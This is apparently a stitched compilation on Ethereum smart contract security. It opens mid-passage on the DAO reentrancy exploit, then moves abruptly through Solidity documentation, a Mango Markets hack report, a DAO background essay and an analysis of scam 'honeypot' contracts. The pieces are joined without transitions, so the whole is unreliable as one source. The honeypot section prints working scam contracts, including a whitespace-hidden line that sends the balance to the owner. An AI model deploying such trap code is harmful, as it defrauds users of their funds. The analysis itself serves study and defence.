p.totalSupply[0] is used to calculate the payout, which is a property of the original proposal and only instantiated once before the attack occurs. So the attack size stays constant despite less available ETH in the DAO with every iteration. The evidence of two malicious contracts calling into withdrawRewardFor on the blockchain suggests that the attacker’s proxy account was also an attack-enabled contract that simply alternated as the attacker with the original contract. This optimization saves the attacker one transaction per attack cycle, but otherwise appears unnecessary. Was 1.1 Vulnerable? Because this vulnerability was in withdrawRewardFor, a natural question to ask is whether the DAO 1.1, with the updated function, was still vulnerable to a similar attack. The answer: yes. Check out the updated function (especially the marked lines): function withdrawRewardFor(address _account) noEther internal returns (bool _success) { if ((balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply < paidOut[_account]) throw; uint reward = (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account]; reward = rewardAccount.balance < reward ? rewardAccount.balance : reward; paidOut[_account] += reward; // XXXXX if (!rewardAccount.payOut(_account, reward)) // XXXXX throw; return true; } Notice how paidOut is updated before the actual payout is made now. So how does this affect our exploit? Well, the second time getRewardFor is called, from inside the evil second call to splitDAO, this line: uint reward = (balanceOf(_account) * rewardAccount.accumulatedInput()) / totalSupply - paidOut[_account]; will come out to 0. The payOut call will then call _recipient.call.value(0)(), which is the default value for that function, making it equivalent to a call to _recipient.call() Because the attacker paid for a lot of gas when sending his malicious split transaction, the recursive attack is allowed to continue with a vengeance. Realizing they needed a 1.2 6 days after a 1.1, on code designed to be secure for years, is probably why the DAO’s puppet masters called it quits. An Important Takeaway I think the susceptibility of 1.1 to this attack is really interesting: even though withdrawReward for was not vulnerable by itself, and even though splitDAO was not vulnerable without withdrawRewardFor, the combination proves deadly. This is probably why this exploit was missed in review so many times by so many different people: reviewers tend to review functions one at a time, and assume that calls to secure subroutines will operate securely and as intended. In the case of Ethereum, even secure functions that involve sending funds could render your original function as vulnerable to reentrancy. Whether they’re functions from the default Solidity libraries or functions that you wrote yourself with security in mind. Special care is required in reviews of Ethereum code to make sure that any functions moving value occur after any state updates whatsoever, otherwise these state values will be necessarily vulnerable to reentrancy. I won’t cover the fork debate or what’s next for Ethereum and The DAO here. That subject is being beaten to death on every form of social media imaginable. For our series of posts, the next step is to reconstruct the exploit on the TestNet using the DAO 1.0 code, and demonstrate both the code behind the exploit and the mechanism of attack. Please note that if someone beats me to these objectives, I reserve the right to cap the length of the series at one. Solidity Solidity is an object-oriented, high-level language for implementing smart contracts. Smart contracts are programs that govern the behavior of accounts within the Ethereum state. Solidity is a curly-bracket language designed to target the Ethereum Virtual Machine (EVM). It is influenced by C++, Python, and JavaScript. You can find more details about which languages Solidity has been inspired by in the :doc:`language influences <language-influences>` section. Solidity is statically typed, supports inheritance, libraries, and complex user-defined types, among other features. With Solidity, you can create contracts for uses such as voting, crowdfunding, blind auctions, and multi-signature wallets. When deploying contracts, you should use the latest released version of Solidity. Apart from exceptional cases, only the latest version receives security fixes. Furthermore, breaking changes, as well as new features, are introduced regularly. We currently use a 0.y.z version number to indicate this fast pace of change. Warning Solidity recently released the 0.8.x version that introduced a lot of breaking changes. Make sure you read :doc:`the full list <080-breaking-changes>`. Ideas for improving Solidity or this documentation are always welcome, read our :doc:`contributors guide <contributing>` for more details. Hint You can download this documentation as PDF, HTML or Epub by clicking on the versions flyout menu in the bottom-left corner and selecting the preferred download format. Getting Started 1. Understand the Smart Contract Basics If you are new to the concept of smart contracts, we recommend you to get started by digging into the “Introduction to Smart Contracts” section, which covers the following: :ref:`A simple example smart contract <simple-smart-contract>` written in Solidity. :ref:`Blockchain Basics <blockchain-basics>`. :ref:`The Ethereum Virtual Machine <the-ethereum-virtual-machine>`. 2. Get to Know Solidity Once you are accustomed to the basics, we recommend you read the :doc:`”Solidity by Example” <solidity-by-example>` and “Language Description” sections to understand the core concepts of the language. 3. Install the Solidity Compiler There are various ways to install the Solidity compiler, simply choose your preferred option and follow the steps outlined on the :ref:`installation page <installing-solidity>`. Hint You can try out code examples directly in your browser with the Remix IDE. Remix is a web browser-based IDE that allows you to write, deploy and administer Solidity smart contracts, without the need to install Solidity locally. Warning As humans write software, it can have bugs. Therefore, you should follow established software development best practices when writing your smart contracts. This includes code review, testing, audits, and correctness proofs. Smart contract users are sometimes more confident with code than their authors, and blockchains and smart contracts have their own unique issues to watch out for, so before working on production code, make sure you read the :ref:`security_considerations` section. 4. Learn More If you want to learn more about building decentralized applications on Ethereum, the Ethereum Developer Resources can help you with further general documentation around Ethereum, and a wide selection of tutorials, tools, and development frameworks. If you have any questions, you can try searching for answers or asking on the Ethereum StackExchange, or our Gitter channel. Translations Community contributors help translate this documentation into several languages. Note that they have varying degrees of completeness and up-to-dateness. The English version stands as a reference. You can switch between languages by clicking on the flyout menu in the bottom-left corner and selecting the preferred language. Chinese French Indonesian Japanese Korean Persian Russian Spanish Turkish Note We set up a GitHub organization and translation workflow to help streamline the community efforts. Please refer to the translation guide in the solidity-docs org for information on how to start a new language or contribute to the community translations. Contents Basic concepts To start off, keep in mind that in Ethereum there are two types of accounts: (i) externally owned accounts controlled by humans and (ii) contract accounts controlled by code. This is important because only contract accounts have associated code, and hence, can have a fallback function. In Ethereum all the action is triggered by transactions or messages (calls) set off by externally owned accounts. Those transactions can be an ether transfer or the triggering of contract code. Remember, contracts can trigger other contracts’ code as well. Smart contracts are written in high-level programming languages such as Solidity but for those contracts to be uploaded on the blockchain, they need to be compiled into bytecode, a low-level programming language executed by the Ethereum Virtual Machine (EVM). Said bytecode can be interpreted with opcodes. When a contract calls or sends money to another contract that code compiles in the EVM bytecode, invoking the call function. But, there is a difference: When calling another contract the call function provides specific function identifiers and data, however, when sending money to another contract, the call function has a set amount of gas but no data (case b below), and thus, triggers the fallback function of the called contract. The attack The fallback function abuse played a very important role in the DAO attack. Let’s see what a fallback function is and how it can be used for malicious purposes. Fallback function A contract can have one anonymous function, known as well as the fallback function. This function does not take any arguments and it is triggered in three cases [1]: a. If none of the functions of the call to the contract match any of the functions in the called contract b. When the contract receives ether without extra data c. If no data was supplied Example The following is sample code for a contract vulnerable to a malicious fallback function of another contract. In this example we have two contracts: (i) the contract Bank (vulnerable contract) and (ii) the contract BankAttacker (malicious contract). Imagine that the contract Bank is the DAO smart contract but much more simplified and the contract BankAttacker is the hacker’s malicious smart contract that emptied the DAO. The hacker initiates the interaction with contract Bank through its malicious contract and the sequence of the actions is as follows: The first thing the hacker does is send ether (75 wei) to the vulnerable contract through the deposit function of the malicious contract. This function calls the addToBalance function of the vulnerable contract. Then, the hacker withdraws, through the withdraw function of the malicious contract, the same amount of wei (75), triggering the withdrawBalance function of the vulnerable contract. The withdrawBalance function first sends ether (75 wei) to the malicious contract, triggering its fallback function, and last updates the userBalances variable (that this piece is done last is very important for the attack). The malicious fallback function calls the withdrawBalance function again (recursive call), doubling the withdraw, before the execution of the first withdrawBalance function finishes, and thus, without updating the userBalances variable. In this example, there are only two recursive calls to the withdrawBalance function so the hacker ends up with a balance of 150 wei. They took more than they should (75 wei) because the userBalance variable is the last thing set/updated. One important point is that unlike the JavaScript’s blocks of code, the EVM executes instructions synchronously, one after the other, and this is why the userBalance variable is updated only after the previous code is finished. The following is a more graphic explanation of the example. The instances referred in this graphic are the different states of the contracts saved in the blockchain. In the graphic you will see that the hacker, through his/her/their external account, triggers the malicious contract, so this contract can interact with the vulnerable contract. Last, here is the example in JavaScript, just in case you are not very familiar with Solidity yet. The hacker stole over $100 million in crypto from the Mango Markets Exchange on Tuesday, and may get to keep almost half of it. Mango DAO has offered a deal to the thief who made off with $100 million in crypto from an exploit in the Mango Markets platform earlier this week—a way to avoid a criminal investigation and pay off bad debt. The Mango DAO, a decentralized autonomous organization that manages Mango Markets, has offered the hacker a bug bounty of $47 million, meaning that the thief would be required to send back $67 million worth of tokens under the terms of the deal. “We are seeking to make users whole to the extent possible,” the Mango DAO proposal says, addressing the thief. On Tuesday, a hacker was able to steal over $100 million through an exploit in the Mango Markets Solana DeFi exchange. The attacker temporarily drove up the value of their collateral and then took out loans from the Mango treasury. The DAO is a so-called Decentralized Autonomous Organization (“DAO”). DAOs run through rules encoded as smart contracts, which in turn are computer programs that facilitate, verify, or enforce the negotiation or performance of a contract, or that make a contractual clause unnecessary. In simple terms, think of any contract between two parties that gets translated into code, so it doesn’t need any external action but does automatically what was agreed. Smart Contracts are a pretty revolutionary and powerful concept by itself and if you want to know more about it, read our separate post on the subject. The idea of a DAO somewhat is that once launched it can run based on its underlying smart contracts alone. The DAO’s smart contracts are based on Etherum, a public blockchain (which is a distributed database – for more information on blockchain, see here) platform with programmable transaction functionality that is also the basis for ether (or ETH), a cryptocurrency. ETH is a cryptocurrency similar to Bitcoin, but very popular since it offers a wider range of services and therefore sometimes considered a considerable challenger of Bitcoin as the leading cryptocurrency. The DAO is fuelled using ether, which creates DAO tokens. DAO token holders will have the right to vote on investment proposals (proportional to the number of tokens held) as well as the opportunity to receive rewards generated by the output of the work from the contractors’ proposals. Since it is decentralized autonomous organization that is represented only by its smart contracts, it has no physical address and people only interact as contractors or curators, but not in managerial roles in the traditional sense. However, it is supported by a limited company and a cryptocurrency exchange in Switzerland, both chosen with a view to the legal and regulatory framework. The DAO is intended as a form of venture capital vehicle that would invest in projects in the sharing economy. Prior to the attack, the fund’s value was around $150 million in ether. So while its creators hoped to build a more democratic financial institution that would be safe against the fallibility of humans by trusting the trustless concept of the blockchain and smart contracts, it seems human error is at the bottom of the heist. Though it is not entirely certain yet how the money has been stolen, it appears that the hacker exploited a programing mistake in the code of the DAO. Weaknesses in the code had already been highlighted before and experts in the field had already called to fix critical problems. At this point it is important to recall that as a blockchain-enabled organization, the DAO is completely transparent and everything is done by the code, which anyone can see and audit. So, it seems that what happened – in a very simplified way – was that the hacker sent repeated transaction request to transfer funds to a DAO clone. Because of the programming error, the system possibly did not immediately update the balance, allowing the attacker to drain the account. Since then the discussion has been how to respond to the attack. In an initial response, Vitalik Buterin, one of Ethereum’s founders, publicly asked online currency exchanges to suspend trading of ether and DAO tokens as well as deposits and withdrawals of the cryptocurrency. Because of a restriction in the code pay-outs are delayed for at least one week, possibly even longer, the hacker will not be able to access the funds and give The DAO community some time. Several options are currently discussed: The community could decide to do nothing, preserve the system and let the DAO token holders loose their investment. Or the so-called “hard-fork” where the Ethereum community could decide to roll back all transactions to a specific point in time before the attack. Or the network could be updated to ensure that all transactions from the hacker’s ether address are blocked, basically freezing the account and trying to exploit a similar programing error to “steel” the money back since the DAO clone is likely to contain the same code structure that made the original attack possible. Regardless which course is decided on, what are the likely consequences for the DAO, Ethereum and the Blockchain in general after this incident? Stephen Tual, COO of Slock.it, the company that had worked on the development of The DAO, stated that The DAO is definitely going to close. Whether that is the case is to be seen as in a leaderless organization no one person alone can decide on the fate of the organisation. The future of the investment vehicle is cast into serious doubt in any case by the theft itself, as it is questionable whether anyone would put money in a construction that has a proven vulnerability even when its makers promise to fix the issues. Trust, after all, is relevant even for a trustless concept when it comes to money. The more damaging aspect for the DAO, but also for Ethereum and potentially even the blockchain technology lies potentially in the actions to get the ether back. In comments across the web it has been compared with a bailout for banks that are too big to fail and that investors simply didn’t understand the risks of their investments. If the system is supposed to be flawless and save against tempering, isn’t meddling with it because of an, albeit very significant and expensive, programming error, undermining the whole idea? If people decide on whether transactions are to be reversed or not instead of the underlying smart contract, what is the worth of such an instrument if it’s only useful if anything goes according to plan? Regardless what happens next it is an immensely important case as well from a legal and regulatory perspective: One tweet even hinted that a short bet on Ether was placed on one cryptocurrencies exchange shortly before the attack, which reminds us that traditional regulatory aspects like Market Abuse are more than relevant in the digital age. The tweet demanded an investigation though that raises the interesting questions about jurisdiction, governing legal frameworks and regulation, but that is only a side aspect to the story for now (though it would make sense from an economical perspective since the thief is unlikely to be able to access the Ether he stole and in that way could gain a monetary benefit from the heist). In an interesting post at Coindesk, a US lawyer discussed the incident from a perspective of criminal law (Theft? Yes!), civil law (sue the hacker? Sure, seems everything can be sued) and tort law. And even more interesting is the question whether the hacker only exploited a loophole in the code. In a message to the DAO and the Ethereum community, which is allegedly from the person responsible for the attack, the hacker described his action simply as using an intentional feature of the code and stated that any action to get the funds back, would amount to seizure of my legitimate and rightful ether, claimed legally through the terms of a smart contract, threatening trying to do so with legal action. Everything is in flux: at the time of writing this, the DAO community is voting on whether to take action and, if so, in what form. Someone claiming to be an intermediary on behalf of the attackers has published a note, making it look like their holding the stolen ether ransom, and tweets on the subject get seemingly posted every second. So to summarise, plenty of open questions, an uncertain future for the DAO, but maybe there is a silver lining that comes from this. Maybe this is only a costly episode on a steep learning curve, similar to other forms of innovation, and maybe this will lead to more care, diligence and scrutiny in future blockchain projects, which in the end might not be so bad after all. Literature: Understanding a Revolutionary and Flawed Grand Experiment in Blockchain: The DAO Attack Journal of Cases on Information Technology Conclusion I’ve learned a lot understanding the DAO exploit, mainly that programming smart contracts is not an easy task and it should be done rigorously. I still have lots of unsolved questions such as: Do we need fallback functions at all? Apparently this was fixed in the new version of Solidity. However, the problem is still present at the EVM level because a hacker can program in opcode and avoid the Solidity’s security GitHub Telegram: https://t.me/cryptodeeptech Video: https://youtu.be/-QDYiKCwOaA Source: https://cryptodeeptech.ru/dao-exploit Криптоанализ
  11. CRYPTO DEEP TECH Following the article: “Solidity Forcibly Send Ether Vulnerability to a Smart Contract continuation of the list of general EcoSystem security from attacks”. In this article, we will continue this topic related to vulnerabilities and traps. In the process of cryptanalysis of various cryptocurrencies, we are increasingly getting loopholes and backdoors. Honeypots work by luring attackers with a balance stored in the smart contract, and what appears to be a vulnerability in the code. Typically, to access the funds, the attacker would have to send their own funds, but unbeknownst to them, there is some kind of recovery mechanism allowing the smart contract owner to recover their own funds along with the funds of the attacker. Let’s look at a couple different real world examples: pragma solidity ^0.4.18; contract MultiplicatorX3 { address public Owner = msg.sender; function() public payable{} function withdraw() payable public { require(msg.sender == Owner); Owner.transfer(this.balance); } function Command(address adr,bytes data) payable public { require(msg.sender == Owner); adr.call.value(msg.value)(data); } function multiplicate(address adr) public payable { if(msg.value>=this.balance) { adr.transfer(this.balance+msg.value); } } } In this contract, it seems that by sending more than the contract balance to multiplicate(), you can set your address as the contract owner, then proceed to drain the contract of funds. However, although it seems that this.balance is updated after the function is executed, it is actually updated before the function is called, meaning that multiplicate() is never executed, yet the attackers funds are locked in the contract. pragma solidity ^0.4.19; contract Gift_1_ETH { bool passHasBeenSet = false; function()payable{} function GetHash(bytes pass) constant returns (bytes32) {return sha3(pass);} bytes32 public hashPass; function SetPass(bytes32 hash) public payable { if(!passHasBeenSet&&(msg.value >= 1 ether)) { hashPass = hash; } } function GetGift(bytes pass) external payable { if(hashPass == sha3(pass)) { msg.sender.transfer(this.balance); } } function PassHasBeenSet(bytes32 hash) public { if(hash==hashPass) { passHasBeenSet=true; } } } This contract is especially sneaky. So long as passHasBeenSet is still set to false, anyone could GetHash(), SetPass(), and GetGift(). The sneaky part of this contract, is that the last sentence is entirely true, but the problem is that passHasBeenSet is already set to true, even though it’s not in the etherscan transaction log. You see, when smart contracts make transactions to each other they don’t appear in the transaction log, this is because they perform what’s known as a message call and not a transaction. So what happened here, must have been some external contract setting the pass before anyone else could. A safer method the attacker should have used would have been to check the contract storage with a security analysis tool. Hardly a week passes without large scale hacks in the crypto world. It’s not just centralised exchanges that are targets of attackers. Successful hacks such as the DAO, Parity1 and Parity2 have shown that vulnerabilities in smart contracts can lead to losing digital assets worth millions of dollars. Attackers are driven by making profits and with the incredible value appreciation in 2017 in the crypto world, individuals and organisations who hold or manage digital assets are often vulnerable to attacks. Especially smart contracts have become a prime target for attackers for the following reasons: Finality of transactions: This is a special property of blockchain systems and it means that once a transaction (or state change) took place it can’t be taken back or at least not with grave consequences which in case of the DAO hack led to a hard fork. For an attacker targeting smart contracts, finality is a great property since a successful attack can not easily be undone. In traditional banking systems this is quite different, an attack even though initially successful could be stopped and any transactions could be rolled back if noticed early enough. Monetising successful attacks is straight forward: Once the funds of a smart contract can be withdrawn to an attacker’s account, transferring the funds to an exchange and cashing out in Fiat while concealing ones identity is something that the attackers can get away with if they are careful enough. Availability of contract source code / byte code: Ethereum is a public blockchain and so at least the byte code of a smart contract is available to anyone. Blockchain explorers such Etherscan allow also to attach source code to a smart contract and so giving access to high level Solidity code to potential attackers. Since we have established now why attackers find smart contracts attractive targets, let’s further look into the circumstances that could decide if a smart contracts gets attacked: Balance: The greater the balance of a smart contract the more attackers will try to attack it and the more time they are willing to spend to find a vulnerability. This is an easier economic equation than for none smart contract targets since the balance that can be potentially stolen is public and attackers have certainty on how profitable a successful attack could be. Difficulty/Time: This is the unknown variable in the equation. Yet the approach to look for potential targets can be automated by using smart contract vulnerability scanners. Availability of source code addtionally decreases analyis time while also lowering the bar for potential attackers to hack smart contracts since byte code is harder to read and therefore it takes more skill and time to analyse. Taking the two factors above in consideration, one could assume that every smart contract published to the main net with a sufficient balance is analysed automatically by scanners or/and manually by humans for vulnerabilities and is likely going to be exploited if it is in fact vulnerable. The economic incentives and the availability of smart contracts on the public chain have given rise to a very active group attackers, trying to steal from vulnerable smart contracts. Among this larger group of attackers, a few seem to have specialised to hack the hackers by creating seemingly vulnerable smart contracts. In many ways these contracts have resemblance to honeypot systems. They are created to lure attackers with the following properties: Balance: Honeypots are created with an initial balance that often seem to be in the range of 0.5–1.0 ETH. Vulnerability: A weakness in the code that seemingly allows an attacker to withdraw all the funds. Recovery Mechanism: Allows owner to reclaim the funds including the funds of the attacker. Let’s analyse three different types of smart contract honeypots that I have come across over the last couple of weeks. honeypot1: Multiplicator.sol The contract’s source code was published on Etherscan with a seemingly vulnerable function. Try to spot the trap. GITHUB This is a really a short contract and the multiplicate() function is the only function that does allow a call from anyone else than the owner of the contract. At first glance it looks like by transferring more than the current balance of the contract it is possible to withdraw the full balance. Both statements in line 29 and 31 try to reinforce the idea that this.balance is somehow credited after the function is finished. This is a trap since the this.balance is updated before the multiplicate() function is called and so if(msg.value>=this.balance) is never true unless this.balance is initially zero. It seems that someone has actually tried to call multiplicate() with 1.1 Ether. Shortly after the owner has withdrawn the full balance. honeypot2: Gift_1_ETH.sol GITHUB The contract has a promising name, if you want to figure out the trap yourself have a look at the code here. Also check out the transaction log … why did 0xc4126a64c546677146FfB3f3D5A6F6d5A2F94DF1 lose 1 ETH? It seems that 0xc4126a64c546677146FfB3f3D5A6F6d5A2F94DF1 did everything right. First SetPass() was called to overwrite hashPass and then GetGift() to withdraw the Ether. Also the attacker made sure PassHasBeenSet() has not been called. So what went wrong? One important piece of information in order to understand honeypot2 is to clarify what internal transactions are. They actually do not exist according to the specifications in the Ethereum Yellow Paper (see Appendix A for terminologies). Transactions can only be sent by External Actors to other External Actors or non-empty associated EVM Code accounts or what is commonly referred to as smart contracts. If smart contracts exchange value between each other then they perform a Message Call not a Transaction. The terminology used by EtherScan and other blockchain explorers can be misleading. It’s interesting how one takes information as a given truth if the data comes from a familiar source. In this case EtherScan does not show the full picture of what happened. The assumption is that the transaction (or message call) should show up in internal transactions tab but it seems that calls from other contracts that have msg.value set to zero are not listed currently. Etherchain on the other hand shows the transaction (or message call) that called PassHasBeenSet() with the correct hash and so denying any future password reset. The attacker (in this case more of a victim) could have also been more careful and actually read the contract storage with Mythril for instance. It would have been apparent that passHasBeenSet is already set to true. honeypot3: TestToken I have taken the trick from the honeypot contract WhaleGiveaway1 (see analysis) and combined it with one of my own ideas. The contract is available here on my Github. Something is missing here … This contract relies on a very simple yet effective technique. It uses a lot of whitespaces to push some of the code to the right and out of the immediate visibility of the editor if horizontal scrolling is enabled (WhaleGiveaway1). When you try this locally in Remix and you purely rely on the scrolling technique like in WhaleGiveaway1 then the trick actually does not work. It would be effective if an attacker copies the code and is actually able to exploit the issue locally but then fails on the main net. This can be done using block numbers. Based on what network is used the block numbers vary significantly from the main net. Ganache: starts from 0 Testrpc: starts from 1150000 Ropsten: a few weeks ago around 2596174 Main net: a few weeks ago around 5040270 Therefore the first if statement is only true on the main net and transfers all ETH to the owner. On the other networks the “invisible” code is not executed. if (block.number > 5040270 ) {if (_owner == msg.sender ){_owner.transfer(this.balance);} else {throw;}} EtherScan also had the horizontal scrolling enabled, but they deactivated it a few a few weeks ago. TL;DR Smart contract honeypot authors form a very interesting sub culture among a larger group of hackers trying to profit from vulnerable smart contracts. In general I would like to give anyone the following advice: Be careful where you send your ETH, it could be a trap. Be nice and don’t steal from people. I have created a Github repo for honeypot smart contracts here. Should you have any honey pot contracts yourself that you want to share please feel free to push them to the repo or share them in the comments. https://cryptodeep.ru/doc/The_Art_of_The_Scam_Demystifying_Honeypots_in_Ethereum_Smart_Contracts.pdf Honeypot programs are one of the best tools that security researchers have ever made to study the new or unknown hacking techniques used by attackers. Therefore, using honeypots in smart contract could be a very good idea to study those attacks. So what is honeypot in smart contract? Honeypots in the Blockchain industry is an intentionally vulnerable smart contract that was made to push attackers to exploit its vulnerability. The idea is to convince attackers or even simple users to send a small portion of cryptocurrency to the contract to exploit it, then lock those ethers in the contract. In this blog post, you are going to see some examples of those honeypots with a detailed technical explanation of how they work. So if you are interested to learn more about this subject just keep reading and leave a comment at the end. What is honeypot in smart contract? A honeypot is a smart contract that purports to leak cash to an arbitrary user due to a clear vulnerability in its code in exchange for extra payments from that user. The monies donated by the user to the vulnerable contract get then locked in the contract and only the honeypot designer or attacker will be able to recover them. The concept of a honeypot is well known in the field of network security and was used for years by security research. The main objective of using them was to identify new or unknown exploits or techniques already used in the wild. In addition, Honeypots were used to identify zero-day vulnerabilities and report them to vendors. This technique was basically designed to trap black hat hackers and learn from them. However, with the rise of Blockchain technology and the smart contract concept. Blockchain is the new trending technology in the market, many companies start to implement it to solve multiple problems. Usually, this technology manages the different types of user information related to their money. Therefore, to secure this technology you should first understand how it works. Blockchain technology can be seen as a 6 layer system that works together. Therefore, what are the six layers of blockchain technology? The Blockchain technology is built upon 6 main layers that are: The TCP/IP network Peer-to-Peer protocols Consensus algorithms Cryptography algorithms Execution (Data blocs, Transactions, …) Applications (Dapps, smart contracts …) Black hat hackers started to use this concept to trap users both with good or bad intentions. The idea is simple, the honeypot designer creates a smart contract and puts a clear vulnerability in it. Then hid a malicious code in its smart contract or between its transactions to block the right execution of the withdraw function. Then he deploys the contract and waits for other users to get into the trap. Best 10 solidity smart contract audit tools that both developers and auditors use during their audit? Slither Securify SmartCheck Oyente Mythril ContractFuzzer Remix IDE static analysis plug-in Manticore sFuzz MadMax What actually makes this concept even more dangerous in the context of blockchain is that implementing a honeypot is not really difficult and does not require advanced skills. In fact, any user can implement a honeypot in the blockchain, all it needs is the actual fees to deploy such a contract in the blockchain. In fact, in the blockchain, the word “attacker” could be given to both the one who deploys the smart contract honeypot and the one trying to exploit it (depending on his intention). Therefore, in the following sections of this blog post, we will use the word “deployer” to the one who implements the honeypot and “user” to the one trying to exploit that smart contract. What are the types of smart contract honeypots? Honeypots in smart contract can be divided into 3 main categories depending on the used techniques: EVM based smart contract honeypots Solidity compiler-based smart contract honeypots Etherscan based smart contract honeypots The main idea of honeypot in the network context is to supervise an intentionally vulnerable component to see how it can be exploited by hackers. However, in smart contract the main idea is to hide a behavior from users and trick them to send ether to gain more due to the vulnerability exploitation. six things you should do to prevent using components with known vulnerabilities: Use components from official repositories Remove unused components Only accept components with active support Put a vulnerability management system for you components Put in place a components firewall Remove or replace components with a stopped support Therefore, what actually defines each smart contract honeypot category is the used technique to hide that information from users. The first category of smart contract honeypot is based on the way the EVM instruction is executed. It is true that the EVM follow an exact set of rules, however, some instruction requires a very good experience with the way EVM works to be able to detect the honeypot otherwise the user could easily be fooled. The second category of smart contract honeypot is related to the solidity compiler. In other words, the smart contract honeypot builder should have a good experience with smart contract development and a deep understanding of how Solidity compiler would work. For example, the way inherence is managed by each version of the solidity compiler, or when overwriting variables or parameters would happen. The third category of smart contract honeypot is based on hiding things from the users. Most users that try to exploit a program look for the easier way to do so (quick wins). Therefore, they may not take the time to analyze all parts of the vulnerable smart contract. This user behavior leads to locking his money in the smart contract. In this blog post, we are going to discuss 4 techniques used by deployers to hide an internal behavior from the users and therefore fool the user. EVM based smart contract honeypots The EVM-based smart contract honeypots have only one subtype called balance disorder. I think the best way to understand how this type of smart contract honeypots works, is by example. So take a look at the following example: This example is taken from the following contract: https://etherscan.io/address/0x8b3e6e910dfd6b406f9f15962b3656e799f60d2b#code A quick look at this function from a user, he can easily understand that if he sends while calling this function more than what the contract balance actually has, then everything in the contract plus what he sends will be sent back to him. Which is obviously a good deal. However, what a user could miss in this quick analysis of the smart contract is that the contract balance will be incremented as soon as the function of the call is performed by the user. This means that the msg.value will always be lower than the contract balance no matter what you do. Therefore, the condition will never be true and the contract will be locked in this contract. Another example of the balance disorder type of honeypot could be found here: https://etherscan.io/address/0xf2cf114be39a48aa2321ed39c1f132da0c51e453 By visiting this link you can see that there is no source code out there. So there are two ways to analyze this contract. The first one and the most difficult is to get the bytecode of this smart contract and then try to understand and reverse engineer it. Or the second way is to try to decompile it using different tools available to get an intermediate and easy-to-understand source code. I personally used the second technique to accelerate the analysis and simply used the Etherscan default decompile. In the smart contract you want to decompile you can click here: And wait for a moment about 30 seconds to get the source code. By taking a look at the source code, and especially at the “multiplicate” function you can now easily see the same logic as the previously explained example. The condition in line 24 will never be verified and the money will be stuck in the contract. Solidity compiler-based smart contract honeypots As I said, this category of smart contract honeypots is based on some deep knowledge about how the Solidity compiler works. In the following subsection, I will give you 4 techniques that are used to build this kind of smart contract honeypots. However, other unknown techniques might be used in the wild, and I will do my best to update this blog post whenever I found a new one. Please comment below and tell me if you know a technique that was not noted in this blog post. Inheritance Disorder technique One of the most confusing systems in solidity language or even in other programming languages is inheritance. A lot of hidden aspects in this concept could be used by deployer to fool the users and work contrary to what is expected. In solidity language, a smart contract can implement the inheritance concept by using the word “is” followed by the different smart contract that this one wants to inherit their source code. Then only one smart contract is created and the source code from the other contracts is copied into it. To better understand how such a mechanism could be exploited to create honeypots please take a look at the following examples: Example1: You can find this contract here: https://etherscan.io/address/0xd3bd3c8fb11429b0deee5301e72b66fba29782c0#code If you take a look at this contract source code, you can easily notice that it has an obvious vulnerability related to access control. The function setup allows a user to change the owner of this contract without checking if he is the actual owner. Therefore, the user would be able to execute the withdraw function to get the money. However, this analysis assumes that the isOwner() function inherited from the Ownable contract is going to check the local variable Owner. Unfortunately, this is not what will actually happen. The inheritance creates a different variable for each contract even if they have the same name. The variable Ownable.Owner is totally different than the ICO.Owner. Therefore, when the user will call the setup() function, this one will change the value of ICO.Owner and not Ownable.Owner. This means that the result of the isOwner() will remain the same. Example2 Another example of this same type of solidity compiler-based honeypot can be found here. The same logic applies to this smart contract. The Owner variable will not change by calling the setup() function. Skip Empty String Literal Another tricky behavior in solidity compiler that may not be very easy to discover is the skip empty string literal. The skip empty string literal problem happens in solidity when a function is called with an empty string as a parameter. This is a known bug in solidity compilers before 0.4.13 here is a reference for it. The encoder skips the empty string literal “” when used as a parameter in a function call. As a result, the encoding of all subsequent arguments is moved left by 32 bytes, causing the function call data to be malformed. This kind of honeypot could be easily detected, by just looking at the solidity compiler version and then scrolling down the source code to see if there is any use of the empty string in a function call. However, a knowledge of this bug is required to detect the problem in the smart contract. Here is a simple example of this honeypot: Check the following smart contract: https://etherscan.io/address/0x2b990227344300aded3a072b3bfb9878b209da0a#code The source code is a little bit long so I will put just the most important functions: In the divest() function line 83, the external function call to loggedTransfer() with the empty string will result in shifting the parameters by 32 bytes which leads to replacing the target address from msg.sender to the owner address. Therefore, the user will send the money to the owner of the contract and not his own address. This simply means that the user will never be able to retrieve the money he sent to this smart contract. Type Deduction Overflow The Solidity compiler offers a nice feature that helps developers declare a variable without knowing exactly what type it would be. This could be made by creating a variable with the keyword “var” and the compiler will deduce what type is better for that result. However, this technique may cause a problem called type deduction overflow. This problem could be used in a smart contract honeypot to cause a revert and then lock the money on the contract. To better illustrate this problem please take a look at the following source code: You can check the whole code here: https://etherscan.io/address/0x48493465a6a2d8db8616a3c7288a9f81d54a8835#code In this contract the Double() function allow a user to double his money by first sending at least more than one ether and then looping to create the value of the ethers that will be sent to the user. This seems to be a nice and easy smart contract to exploit. However, this contract loop will never reach even half of the value sent by the user. The reason behind this is the way the variable “i” is declared. The “var” keyword, will create a variable with a type of uint8 due to the 0 value affected to it in the beginning. The code should loop till it gets to msg.value which is a uint256 and the value would be more than 1 with 18 digits. However, the size of the “i” variable can only reach 255 then once incremented will get back to 0. Therefore, the loop will end and all that the user will receive is 255 wei. Uninitialized Struct The uninitialized structure is a common problem in solidity and could be seen both as a vulnerability and as a way to trick users. In this blog post, I am going to discuss the tricky part of this problem. However, if you want me to discuss how this could be a vulnerability, please comment below and I will be happy to make a blog post about it. An uninitialized structure problem happens when a structure variable is not initialized at the moment of its creation. When a structure variable is not initialized in the same line as its creation with the keyword “new”, the solidity compiler point that variable to the first slot of the smart contract. This simply means the variable will be pointing to the first variable of the smart contract. Once the developer starts affecting values to the structure variable, the first element value of the structure will overwrite the first variable value. This concept is used by smart contract honeypots deployer to trick users to send money to exploit an obvious vulnerability in it. Here is an example of such a honeypot: https://etherscan.io/address/0x29ed301f073f62acc13a2d3df64db4a3185f1433#code This contract asks the user to guess a number while betting with some of his money. The secret value that a user is going to guess is stored in the first slot of the smart contract. For a quick analysis of this contract, the user would assume that the contract is vulnerable as even private variables could be seen in the Blockchain. However, once the user will call the play() function and send money to it, the function will create a structure “game” in line 51 without correctly initializing it. This means that this structure variable will point to the first slot (variable secretNumber). In addition, the game.player will be the variable that will overwrite the secretNumber variable. Therefore, the user “would not” will not be able to correctly guess the number. Actually, in this example, the honeypot could be bypassed to retrieve the money. If you take a look at the value affected to the game.player variable that overwrite the secretNumber. You will see that it is simply the sender’s address. Therefore, the value the user should send, is simply his address converted to decimals. Etherscan based smart contract honeypots All the smart contracts that we have seen until now, exploit a solidity language gap of knowledge in the user. 